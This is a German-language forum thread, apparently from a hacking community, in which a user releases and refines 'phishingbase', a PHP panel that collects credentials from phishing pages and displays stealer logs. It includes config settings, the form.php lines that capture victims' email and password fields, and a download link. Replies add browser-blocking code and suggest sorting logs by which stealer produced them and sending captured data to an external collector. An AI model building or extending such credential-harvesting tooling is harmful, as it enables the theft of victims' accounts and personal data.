[entfernt]

OK Also 1. Fehler bei den Logs.
Wenn die Query leer ist kommt da ein Error.
Das umgehst du am besten mit einer Abfrage ob mysql_num_rows() > 0 ist und sollte es kleiner als 1 sein springst du einfach Zeile 57(scheint mir richtig).
//Edit: Das Springen tust du mit if (sry kommt von asm :S)

Das Selbe bei search_ajax bei der Zeile 25.

Naja Logs werden iwie auch nicht angezeigt (bei mir).
Teste es doch vorher selber ;)

Ansonsten nette Grundlage.

//Edit: Hab mal für weiterentwickeln gestimmt.

Vielen Dank für das erste Feedback.

Also getestet habe ich es, funktionieren tut es ;-) Wäre schön wenn es noch ein paar Leute testen können, sonst lohnt es sich nicht das Ding zu verbessern.

Natürlich musst du noch die .sql in phpmyadmin importieren und die config.php anpassen...

Kannst ja 'nen Installer schreiben, dann geht das alles viel einfacher. ;)

Nichtmal ne Userauth?

Und der "Noob-Schutz" mit dem IE ist ja wohl ganz schön peinlich...

Für die erste BETA Version finde ich es gut, außerdem wird es ja weiter entwickelt.

[Update]

[+] Installer
[+] Login
[+] Für IE angepasst
[+] form.php einfacher gemacht

Man(n) muss nur noch im Ordner "inc" die config.php anpassen:

//Hier ändern
$server = 'localhost';
$user = 'root';
$pass = '';

//Login user & pass
$adminuser = 'admin';
$adminpass = 'admin';


und bei der form.php wenn man eine Phishing Seite erstellt dies hier:

$username = htmlentities($_POST['email']);
$password = htmlentities($_POST['pwd']);

Bei der Beispielseite ist es schon automatisch drin.

Installieren kann man das ganze unter

deineurl.com/install/index.php

Download: File-Upload.net - phishingbase.rar (http://www.file-upload.net/download-2710660/phishingbase.rar.html)

Viel Spass..

sowas hat man in 15 min. geschrieben aber für den Anfang ist das gut.
Wenn du IE aussperren willst, kannst du es auch mittels Reguläre Ausdrücke machen, z.bsp:


$agent = $_SERVER['HTTP_USER_AGENT'];
if(preg_match("/MSIE/i",$agent))
{
die("<meta http-equiv='refresh' content='0; URL=mudda.html'>");
}

Danke, obwohl ichs schon wusste.

Mach du das bitte mal in 15 Minuten ohne alles Copy & Paste. Man überschätzt sich immer. Dies ist auch mir dir der Fall.

Ich finde es für den Anfang auch gut, mach bitte weiter ;)
Du könntest ja zu den ganzen Logs auch noch die Stealer zuteilen, dazu musst du die Logs aber auslesen entweder .txt oder .html oder bei anderen auch .ini oO
Dann könntest du dieses Coded by auslesen und dann zuteilen, nur musst du auch vorher definieren welche Zeile zu welchem Stealer gehört und das ist Arbeit die zusammen zu suchen.

Aber der Nachteil: Viele werden was dagegen haben, wenn es eine Funktion gibt die, die Logs richtig ausliest und dann postet. Was du da machst ist ja nur darstellen der Dateien die auf dem Server liegen, wäre eigentlich nichts anderes oO

Das Design ist auch schön :)

Ich bekomm immer den fehler
"Zugriff Verweigert"

Kann wer helfen ?

Du musst dich erst unter www.DEINESEITE.TLD/phishingbase/login/index.php (http://www.DEINESEITE.TLD/phishingbase/login/index.php) einloggen :D Dann wird die Session gesetzt ;)

Edit:
Ich fände es cool, wenn du es zB so machst, das man die Phishing Seiten nicht unbedingt in dem gleichen Ordner haben muss wie die "Phishingbase", also zB das du die Daten bei der Action vom Formular an eine PHP Datei von der Phishingbase schickst, so das man diese Extern halten kann. So in der Art vom iStealer 6. Ich hoffe du weißt was ich damit meine. Habe dich auch mal bei icq geadded.

Greetz NoNameMT